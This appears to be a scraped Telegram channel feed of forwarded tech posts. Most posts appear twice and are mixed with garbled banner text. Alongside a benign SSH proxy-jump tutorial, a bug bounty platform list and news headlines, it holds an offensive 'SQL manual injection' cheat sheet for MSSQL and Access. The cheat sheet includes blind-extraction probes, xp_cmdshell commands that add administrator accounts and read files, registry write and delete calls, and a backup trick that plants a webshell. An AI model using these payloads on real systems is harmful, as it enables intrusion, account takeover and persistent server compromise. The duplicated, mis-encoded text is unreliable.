Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ 4 ways to connect to SSH and SCP through a proxy server (jump) on Linux
SCP via proxy
Method 1: using scp with ProxyJump
In openssh package version 7.4p1-11 or newer, we can use the ProxyJump option to transfer files using a proxy server.
The scp command syntax for proxy file transfers is:
# scp -o "ProxyJump <User> @ <Proxy-Server>" <File-Name> <User> @ <Destination-Server>: <Destination-Path>
For instance:
# scp -o "ProxyJump user@10.23.100.70" dataFile.txt user@192.168.10.100: / tmp
user@10.23.100.70's password:
user@192.168.10.100's password:
dataFile.txt
Where my proxy is 10.23.100.70 and the target server is 192.168.10.100.
Method 2: using scp with ProxyCommand
SCP uses ssh as its main protocol and hence we can use ssh options along with scp commands.
Setting up SSH to make your life easier
The syntax for using the ProxyCommand option with the scp command is:
# scp -o "ProxyCommand ssh <user> @ <Proxy-Server> nc% h% p" <File-Name> <User @ <Destination-Server>: <Destination-Path>
Where:
% h will be replaced with the hostname to connect
% p will be replaced with port
When using the ProxyCommand parameter, make sure the nmap-ncat package is installed on the proxy that provides the nc command, otherwise the following error message will be displayed.
bash: nc: command not found
ssh_exchange_identification: Connection closed by remote host
lost connection
For instance:
# scp -o "ProxyCommand ssh user@10.23.100.70 nc% h% p" dataFile.txt root@192.168.10.100: / tmp
user@10.23.100.70's password:
root@192.168.10.100's password:
dataFile.txt 100% 5 0.0KB / s 00:00
Where my proxy is 10.23.100.70 and the target server is 192.168.10.100.
SSH through a proxy server
Method 1: pass ProxyCommand using ssh parameters
We can again use the ProxyCommand to ssh login to another server using a proxy server.
The syntax for SSH over a proxy will be as follows:
# ssh -o "ProxyCommand ssh user_name_on_proxy @ hostname_or_IP_of_proxy nc% h% p" user_name_on_server @ hostname_or_IP_of_server
Example: login as root user at 192.168.10.100 through proxy at 10.23.100.70 with proxy credentials for proxy_user
# ssh -o "ProxyCommand ssh proxy_user@10.23.100.70 nc% h% p" root@192.168.10.100
proxy_user@10.23.100.70's password:
root@192.168.10.100's password:
Last login: Tue Dec 24 10:40:33 2019 from 10.23.100.70
# ip al | grep eth0
2: eth0: <BROADCAST, MULTICAST, UP, LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
inet 192.168.10.100/24 ββbrd 192.168.1.255 scope global eth0
If the nc command is not installed on the proxy server, or you do not have proxy login credentials, but a proxy service such as squid is running on the proxy server that will accept SSH connections, you can use the following command.
Note that this method requires you to have the nc command installed on your local / client system.
# ssh -o "ProxyCommand nc --proxy hostname_or_IP_of_proxy: proxy_service_port --proxy-type http% h% p" user_name_on_server @ hostname_or_IP_of_server
For example, to log in as root on 192.168.10.100 through a proxy service listening on port 3128 on 10.23.100.70.
The proxy service does not require any credentials.
# ssh -o "ProxyCommand nc --proxy 10.23.100.70:3128 --proxy-type http% h% p" root@192.168.10.100
root@192.168.10.100's password:
Last login: Tue Dec 24 10:40:46 2019 from 10.23.100.70
# ip al | grep eth0
2: eth0: <BROADCAST, MULTICAST, UP, LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
inet 192.168.10.100/24 ββbrd 192.168.1.255 scope global eth0
Method 2: Using an ssh client config file
We discussed the SSH client config file in detail
π§ How to check OpenSSH client configuration
π§ How to use SSH configuration for each Linux host
So instead of providing all the options as input arguments for SSH, we can also use the SSH client config file.
π¦ 4 ways to connect to SSH and SCP through a proxy server (jump) on Linux
SCP via proxy
Method 1: using scp with ProxyJump
In openssh package version 7.4p1-11 or newer, we can use the ProxyJump option to transfer files using a proxy server.
The scp command syntax for proxy file transfers is:
# scp -o "ProxyJump <User> @ <Proxy-Server>" <File-Name> <User> @ <Destination-Server>: <Destination-Path>
For instance:
# scp -o "ProxyJump user@10.23.100.70" dataFile.txt user@192.168.10.100: / tmp
user@10.23.100.70's password:
user@192.168.10.100's password:
dataFile.txt
Where my proxy is 10.23.100.70 and the target server is 192.168.10.100.
Method 2: using scp with ProxyCommand
SCP uses ssh as its main protocol and hence we can use ssh options along with scp commands.
Setting up SSH to make your life easier
The syntax for using the ProxyCommand option with the scp command is:
# scp -o "ProxyCommand ssh <user> @ <Proxy-Server> nc% h% p" <File-Name> <User @ <Destination-Server>: <Destination-Path>
Where:
% h will be replaced with the hostname to connect
% p will be replaced with port
When using the ProxyCommand parameter, make sure the nmap-ncat package is installed on the proxy that provides the nc command, otherwise the following error message will be displayed.
bash: nc: command not found
ssh_exchange_identification: Connection closed by remote host
lost connection
For instance:
# scp -o "ProxyCommand ssh user@10.23.100.70 nc% h% p" dataFile.txt root@192.168.10.100: / tmp
user@10.23.100.70's password:
root@192.168.10.100's password:
dataFile.txt 100% 5 0.0KB / s 00:00
Where my proxy is 10.23.100.70 and the target server is 192.168.10.100.
SSH through a proxy server
Method 1: pass ProxyCommand using ssh parameters
We can again use the ProxyCommand to ssh login to another server using a proxy server.
The syntax for SSH over a proxy will be as follows:
# ssh -o "ProxyCommand ssh user_name_on_proxy @ hostname_or_IP_of_proxy nc% h% p" user_name_on_server @ hostname_or_IP_of_server
Example: login as root user at 192.168.10.100 through proxy at 10.23.100.70 with proxy credentials for proxy_user
# ssh -o "ProxyCommand ssh proxy_user@10.23.100.70 nc% h% p" root@192.168.10.100
proxy_user@10.23.100.70's password:
root@192.168.10.100's password:
Last login: Tue Dec 24 10:40:33 2019 from 10.23.100.70
# ip al | grep eth0
2: eth0: <BROADCAST, MULTICAST, UP, LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
inet 192.168.10.100/24 ββbrd 192.168.1.255 scope global eth0
If the nc command is not installed on the proxy server, or you do not have proxy login credentials, but a proxy service such as squid is running on the proxy server that will accept SSH connections, you can use the following command.
Note that this method requires you to have the nc command installed on your local / client system.
# ssh -o "ProxyCommand nc --proxy hostname_or_IP_of_proxy: proxy_service_port --proxy-type http% h% p" user_name_on_server @ hostname_or_IP_of_server
For example, to log in as root on 192.168.10.100 through a proxy service listening on port 3128 on 10.23.100.70.
The proxy service does not require any credentials.
# ssh -o "ProxyCommand nc --proxy 10.23.100.70:3128 --proxy-type http% h% p" root@192.168.10.100
root@192.168.10.100's password:
Last login: Tue Dec 24 10:40:46 2019 from 10.23.100.70
# ip al | grep eth0
2: eth0: <BROADCAST, MULTICAST, UP, LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
inet 192.168.10.100/24 ββbrd 192.168.1.255 scope global eth0
Method 2: Using an ssh client config file
We discussed the SSH client config file in detail
π§ How to check OpenSSH client configuration
π§ How to use SSH configuration for each Linux host
So instead of providing all the options as input arguments for SSH, we can also use the SSH client config file.
Edit the ~ / .ssh / config file as shown below:
# vim ~ / .ssh / config
...
Host <nickname>
HostName <hostname_of_server>
User <user_on_server>
ProxyCommand ssh <user_on_server> @ <proxy_server> nc% h% p
If this file already contains content, you will need to add the above to the end of the file.
Where:
<nickname>: Sets the alias for the target server.
<hostname_of_sever>: sets the real name of the remote server / host
<user_on_server>: the real user that exists on the target server
<proxy_server>: IP or hostname of the proxy server
% h will be replaced with the hostname to connect
% p will be replaced with port
Then you can use SSH with an additional verbose parameter to check the configuration
# ssh -vvv <target_server>
β β β Uππ»βΊπ«Δπ¬πβ β β β
# vim ~ / .ssh / config
...
Host <nickname>
HostName <hostname_of_server>
User <user_on_server>
ProxyCommand ssh <user_on_server> @ <proxy_server> nc% h% p
If this file already contains content, you will need to add the above to the end of the file.
Where:
<nickname>: Sets the alias for the target server.
<hostname_of_sever>: sets the real name of the remote server / host
<user_on_server>: the real user that exists on the target server
<proxy_server>: IP or hostname of the proxy server
% h will be replaced with the hostname to connect
% p will be replaced with port
Then you can use SSH with an additional verbose parameter to check the configuration
# ssh -vvv <target_server>
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
AirPods are here. Will they be immediately accessible next Tuesday on the official website?
#Technologies
#Technologies
Forwarded from UNDERCODE NEWS
Micron responded to the power outage at the Taoyuan plant: production capacity will be restored within a few days.
#Technologies
#Technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
Hacking Platforms :
- [YesWeHack](https://yeswehack.com/)
- [intigriti](https://intigriti.com/)
- [HackerOne](https://hackerone.com/)
- [Bugcrowd](https://bugcrowd.com/)
- [Cobalt](https://cobalt.io/)
- [Bountysource](https://www.bountysource.com/)
- [Bounty Factory](https://bountyfactory.io/)
- [Coder Bounty](http://www.coderbounty.com/)
- [FreedomSponsors](https://freedomsponsors.org/)
- [FOSS Factory](http://www.fossfactory.org/)
- [Synack](https://www.synack.com/)
- [HackenProof](https://hackenproof.com/)
- [Detectify](https://cs.detectify.com/)
- [Bugbountyjp](https://bugbounty.jp/)
- [Safehats](https://safehats.com/)
- [BugbountyHQ](https://www.bugbountyhq.com/)
- [Hackerhive](https://hackerhive.io/)
- [Hacktrophy](https://hacktrophy.com/)
- [AntiHACK](https://www.antihack.me/)
- [CESPPA](https://www.cesppa.com/)
β β β Uππ»βΊπ«Δπ¬πβ β β β
Hacking Platforms :
- [YesWeHack](https://yeswehack.com/)
- [intigriti](https://intigriti.com/)
- [HackerOne](https://hackerone.com/)
- [Bugcrowd](https://bugcrowd.com/)
- [Cobalt](https://cobalt.io/)
- [Bountysource](https://www.bountysource.com/)
- [Bounty Factory](https://bountyfactory.io/)
- [Coder Bounty](http://www.coderbounty.com/)
- [FreedomSponsors](https://freedomsponsors.org/)
- [FOSS Factory](http://www.fossfactory.org/)
- [Synack](https://www.synack.com/)
- [HackenProof](https://hackenproof.com/)
- [Detectify](https://cs.detectify.com/)
- [Bugbountyjp](https://bugbounty.jp/)
- [Safehats](https://safehats.com/)
- [BugbountyHQ](https://www.bugbountyhq.com/)
- [Hackerhive](https://hackerhive.io/)
- [Hacktrophy](https://hacktrophy.com/)
- [AntiHACK](https://www.antihack.me/)
- [CESPPA](https://www.cesppa.com/)
β β β Uππ»βΊπ«Δπ¬πβ β β β
YesWeHack
Global Bug Bounty & Vulnerability Management Platform | YesWeHack
Explore YesWeHack, leading global Bug Bounty & Vulnerability Management Platform. Connect with tens of thousands of ethical hackers worldwide to uncover vulnerabilities in your websites, mobile apps, and digital infrastructure, bolstering your cyber defenceβ¦
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How mount operation relates to partitioning and formatting :
Mounting is one of the types of actions that you can perform on a disk (block device). Referring to the device by its name / dev / * it is possible:
1) create new sections
2) delete existing partitions
3) format partitions or entire disk
4) perform low-level settings at the device level (setting the read
5) only flag at the disk level, reset the write cache on the disk, control Advanced Power Management, etc.), as well as read the values of these settings and disk properties
6) mount disk partitions (or the entire disk if not partitioned)
#fASTtIPS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How mount operation relates to partitioning and formatting :
Mounting is one of the types of actions that you can perform on a disk (block device). Referring to the device by its name / dev / * it is possible:
1) create new sections
2) delete existing partitions
3) format partitions or entire disk
4) perform low-level settings at the device level (setting the read
5) only flag at the disk level, reset the write cache on the disk, control Advanced Power Management, etc.), as well as read the values of these settings and disk properties
6) mount disk partitions (or the entire disk if not partitioned)
#fASTtIPS
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Clop ransomware organization attacked by E-Land Group, disclosed 100,000 credit card information as announced
#Malwares #CyberAttacks
#Malwares #CyberAttacks
β β β Uππ»βΊπ«Δπ¬πβ β β β
SQL manual injection statement & SQL manual injection Daquan:
Look at the following
1. Determine whether there is injection
; and 1=1
; and 1=2
2. Preliminarily determine whether it is mssql
; and user>0
3. Determine the database system
; and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4. The injected parameters are the characters'and
[query condition] and''='
5. When searching, there is no filter parameter
' and [query condition] and'%25 '='
6. Guess the database
; and (select Count(*) from [database name])>0
7. Guess the field
; and (select Count(field name) from database name)>0
8. Guess the record length in the field
; and (select top 1 len(field name) from database name)>0
9. (1) Guess the ascii value of the field (access)
; and (select top 1 asc(mid(field name,1,1)) from database name )>0
(2) Guess the ascii value of the field (mssql)
;and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test permission structure (mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1= (select IS_MEMBER('db_owner')); -
11.Add mssql and system accounts
; exec master.dbo.sp_addlogin username; -
;exec master.dbo.sp_password null,username,password; -
;exec master. dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell'net user username password /add';--
;exec master.dbo.xp_cmdshell'net localgroup administrators username /add';--
12.(1) Traverse directories
; create table dirs(paths varchar (100), id int)
;insert dirs exec master.dbo.xp_dirtree'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('δΈζ₯The obtained paths'))>)
(2) Traverse the directory
; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)); -
;insert temp exec master .dbo.xp_availablemedia; - get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs'c:\'; - get a list of subdirectories
; insert into temp(id,num1) exec master.dbo. xp_dirtree'c:\'; - get the directory tree structure of all subdirectories
;insert into temp(id) exec master.dbo.xp_cmdshell'type c:\web\index.asp';-- view the content of the file
13. The stored procedure
xp_regenumvalues ββin mssql registry root key, subkey
; exec xp_regenumvalues' HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' returns all key values ββin multiple record sets
xp_regread root key, subkey, key value name
; exec xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion' ,'CommonFilesDir' returns the value of the
specified key xp_regwrite root key, subkey, value name, value type, value
There are two types of value types. REG_SZ means character type, REG_DWORD means integer type
; exec xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows \CurrentVersion','TestvalueName','reg_sz','hello' write to the registry
xp_regdeletevalue root key, subkey, value name
exec xp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' delete a value
xp_regdeletekey'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' Delete key, including all values ββunder this key
14.mssql backup creation webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ( '');
backup database model to disk='c:\l.asp';
β β β Uππ»βΊπ«Δπ¬πβ β β β
SQL manual injection statement & SQL manual injection Daquan:
Look at the following
1. Determine whether there is injection
; and 1=1
; and 1=2
2. Preliminarily determine whether it is mssql
; and user>0
3. Determine the database system
; and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4. The injected parameters are the characters'and
[query condition] and''='
5. When searching, there is no filter parameter
' and [query condition] and'%25 '='
6. Guess the database
; and (select Count(*) from [database name])>0
7. Guess the field
; and (select Count(field name) from database name)>0
8. Guess the record length in the field
; and (select top 1 len(field name) from database name)>0
9. (1) Guess the ascii value of the field (access)
; and (select top 1 asc(mid(field name,1,1)) from database name )>0
(2) Guess the ascii value of the field (mssql)
;and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test permission structure (mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1= (select IS_MEMBER('db_owner')); -
11.Add mssql and system accounts
; exec master.dbo.sp_addlogin username; -
;exec master.dbo.sp_password null,username,password; -
;exec master. dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell'net user username password /add';--
;exec master.dbo.xp_cmdshell'net localgroup administrators username /add';--
12.(1) Traverse directories
; create table dirs(paths varchar (100), id int)
;insert dirs exec master.dbo.xp_dirtree'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('δΈζ₯The obtained paths'))>)
(2) Traverse the directory
; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)); -
;insert temp exec master .dbo.xp_availablemedia; - get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs'c:\'; - get a list of subdirectories
; insert into temp(id,num1) exec master.dbo. xp_dirtree'c:\'; - get the directory tree structure of all subdirectories
;insert into temp(id) exec master.dbo.xp_cmdshell'type c:\web\index.asp';-- view the content of the file
13. The stored procedure
xp_regenumvalues ββin mssql registry root key, subkey
; exec xp_regenumvalues' HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' returns all key values ββin multiple record sets
xp_regread root key, subkey, key value name
; exec xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion' ,'CommonFilesDir' returns the value of the
specified key xp_regwrite root key, subkey, value name, value type, value
There are two types of value types. REG_SZ means character type, REG_DWORD means integer type
; exec xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows \CurrentVersion','TestvalueName','reg_sz','hello' write to the registry
xp_regdeletevalue root key, subkey, value name
exec xp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' delete a value
xp_regdeletekey'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' Delete key, including all values ββunder this key
14.mssql backup creation webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ( '');
backup database model to disk='c:\l.asp';
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
With "remote" DX, JAL and ANA open up the future, transporting remote islands to space avatars
#Technologies #international
#Technologies #international
